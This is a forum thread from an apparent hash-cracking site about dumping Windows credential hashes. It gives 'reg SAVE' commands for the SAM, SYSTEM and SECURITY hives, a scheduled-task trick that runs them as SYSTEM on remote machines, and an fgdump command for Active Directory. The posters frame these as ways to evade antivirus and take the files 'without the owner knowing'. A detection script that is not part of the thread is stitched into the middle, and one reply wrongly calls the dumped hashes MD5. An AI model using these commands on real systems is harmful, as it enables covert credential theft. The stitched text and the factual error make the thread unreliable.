Manually save SAM SYSTEM registry hives

blandyuk (Admin / Owner)
Wed, 12 Oct 2011 @ 10:21:26

Been wanting to know how to do this for ages, without using pwdump OR SAMInside OR Cain & Able etc. Here is how it's done:

You need to use a user who is in the "Administrators" group, OR you can create a Scheduled Task and run it as the "SYSTEM" user, and run the following from cmd.exe:

reg SAVE HKLM\SAM [drive]:\sam.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

Once done, use whatever, SAM Inside, Cain & Abel, to load hashes and crack 'em.

Q). Why would you want to do it this way?
A). Most server Anti-Virus programs are locked down even though you're in the "Administrators" group, meaning your nice "pwdump" programs will get removed instantly. This way does mean you can get the 2 hives without the AV software interfering.


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

blandyuk (Admin / Owner)
Wed, 12 Oct 2011 @ 10:22:19

Update on this, to get the Domain Cache logins:

reg SAVE HKLM\SECURITY [drive]:\security.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

With WinXP, you'll get "Access Denied" on the HKLM\SECURITY hive. To get round this, type this in at the command line:

at 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

Note: the 15:00 is the time, please change as necessary. This will create a Windows schedule and use the [machine]\SYSTEM user to run it, which has access. You can also run this remotely on another machine as long as you have local administrator access. Simply run:

at \\[machine] 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

This will save the reg files locally on \\[machine], so you can simply SMB on and get them without the owner knowing.

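Detection-side counterpart to the two posts above, written as an added example that is not part of the thread: a small Python checker run over a constructed sample of process-creation records (the field names `user`, `image` and `cmdline` are my assumption, modelled loosely on Windows Security event 4688, not a real log schema). It flags `reg save` / `reg export` of the SAM, SECURITY or SYSTEM hive roots, the `at` / `schtasks`-scheduled variant including the remote `\\machine` form, and a hive save executed as SYSTEM, while ignoring `reg query` and saves of unrelated keys.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of process-creation records. Field names (user, image,
# cmdline) are an assumption modelled loosely on Windows Security event 4688;
# they are not a real log schema. Host names and paths are made up.
SAMPLE_EVENTS = [
    {"id": 1, "user": r"CORP\alice", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg SAVE HKLM\SAM D:\sam.hive"},
    {"id": 2, "user": r"CORP\alice", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\system d:\system.hive"},
    {"id": 3, "user": r"CORP\alice", "image": r"C:\Windows\System32\at.exe",
     "cmdline": r"at \\FILESRV01 15:00 reg SAVE HKLM\SECURITY C:\security.hive"},
    {"id": 4, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg SAVE HKLM\SECURITY C:\security.hive"},
    {"id": 5, "user": r"CORP\bob", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"id": 6, "user": r"CORP\bob", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKCU\Software\MyApp C:\backup\myapp.hive"},
]

# Hive roots that hold credential material: SAM (local account hashes),
# SECURITY (LSA secrets and cached domain logons), SYSTEM (the boot key that
# decrypts the other two). The lookahead insists on the root itself, so a
# save of some SYSTEM subkey is not flagged.
HIVE_RE = re.compile(r"\b(?:hklm|hkey_local_machine)\\(sam|security|system)(?=\s|$)", re.I)
# reg.exe verbs that write a hive to disk (reg query/add do not).
SAVE_RE = re.compile(r"\breg(?:\.exe)?\b.*?\b(?:save|export)\b", re.I)
# A UNC-style \\host argument, as used by "at \\machine <time> <command>".
REMOTE_RE = re.compile(r"(?<!\S)\\\\([\w.-]+)")
SCHEDULERS = {"at.exe", "schtasks.exe"}


@dataclass
class Finding:
    event_id: int
    rule: str
    hive: str
    user: str
    remote_host: Optional[str] = None


def analyze_event(ev):
    """Return a Finding for one record, or None if it is not a hive dump."""
    cmd = ev["cmdline"]
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    hive_m = HIVE_RE.search(cmd)
    if not hive_m or not SAVE_RE.search(cmd):
        return None
    hive = hive_m.group(1).upper()
    remote = REMOTE_RE.search(cmd)
    host = remote.group(1) if remote else None
    if image in SCHEDULERS:
        # The hive save is being queued through the task scheduler so that it
        # runs as SYSTEM later, possibly on another machine.
        rule = "scheduled-hive-dump"
    elif ev["user"].upper().endswith("\\SYSTEM"):
        # The queued job firing: reg.exe saving a hive under the SYSTEM account.
        rule = "hive-dump-as-system"
    else:
        rule = "credential-hive-dump"
    return Finding(ev["id"], rule, hive, ev["user"], host)


def analyze(events):
    """Run analyze_event over a list of records and keep the hits."""
    return [f for f in map(analyze_event, events) if f is not None]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        where = f" on {f.remote_host}" if f.remote_host else ""
        print(f"event {f.event_id}: {f.rule} of {f.hive} by {f.user}{where}")
```

The three rule names separate the interactive command, the scheduling step and the later SYSTEM-context execution, because an alert on the first alone misses the case the second post describes, where the operator never runs reg.exe against SECURITY directly. Events 5 and 6 are the benign controls: reading a key and saving a non-credential hive should produce nothing.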

Hash-IT
Mon, 23 Jan 2012 @ 16:47:44

Thank you for posting this Blandy, it's useful stuff!

XP Pro

I have managed to crack my own computer using the method where I copy the files from my local running C drive.

C:\WINDOWS\system32\config\SAM
C:\WINDOWS\system32\config\SYSTEM


Server 2003.

In another test I loaded a server up (Server 2003) and performed the same as above. However, I noticed that I only have my own administrator user name and password in the SAM + SYSTEM files and not the "test" user I had made on the domain.

Do you know how I can do this when I physically have the drive on my desk? I would like to be able to copy all usernames and password hashes from a slave drive (ghost image of the actual server C drive) connected to my computer.

Separate question.
Would I be able to do this via a LAN connection also? I have the Administrator password obviously, as it is my domain, but I wondered if it is possible to copy all domain user names and password hashes, with or without using remote desktop, from a computer on the LAN?

Thank you very much.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

blandyuk (Admin / Owner)
Mon, 23 Jan 2012 @ 17:21:50

You cannot get a full list of Active Directory users on a Domain this way. The only way is to either do a pwdump on the shared drive on the domain network, OR crack the Domain Cache Cred logins on a computer that is used by users (Windows stores the last 10 domain users and passwords as DCC hashes).

-
edited by blandyuk on 07/01/2013


Hash-IT
Mon, 23 Jan 2012 @ 17:37:15

Thank you for taking the time to write back, I am sorry I don't understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive?

Surely the server has to store the details somewhere?

Thanks.


hasheponge
Mon, 23 Jan 2012 @ 18:18:46

Hash-IT said:

> Thank you for taking the time to write back, I am sorry I don't understand.
>
> Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive?
>
> Surely the server has to store the details somewhere?
>
> Thanks.

You can only extract "cache persistent" (if the GPO of the domain AD is ok) on your server, but a full list of Active Directory users is not easy.... Using sniffing and trying to downgrade to LM&NTLMv1 authentication is possible...


Specs -
Nvidia 660 Ti - 470 GTX - Radeon 6950

Hash-IT
Mon, 23 Jan 2012 @ 18:30:00

Thanks hasheponge for your help.

I am amazed that this is not possible. I wonder where the usernames and hashes are stored then, if not on the C drive of the server!

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled! Ha ha!

Is it all locked down and encrypted or something when Server 2003 shuts down?


hasheponge
Tue, 24 Jan 2012 @ 10:27:44

Hash-IT said:

> Thanks hasheponge for your help.
>
> I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server!

==> in the database on the DC (domain controller), see: http://en.wikipedia.org/wiki/Active_Directory#Database

> If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled! Ha ha!

==> lol ;-)

> Is it all locked down and encrypted or something when Server 2003 shuts down?


To attack AD 2003, see:

0 - But you must log in with a domain admin...

1 - Download fgdump

2 - Execute:

fgdump.exe -h ServerAD -u AdminDomain -p passadmindomain

3 - Then you extract a file: ServerAD.pwdump ==> The hash is MD5 inside this file...

4 - Try to crack ;-)

edited by hasheponge on 24/01/2012


Hash-IT
Tue, 24 Jan 2012 @ 22:28:57

Thanks hasheponge

I got reading that link you kindly supplied me, and the program also, and completely lost track of time. So I haven't long to write just now, but I just wanted to say thank you for posting and setting me off in the right direction!

I will most likely come back later!! Ha ha!
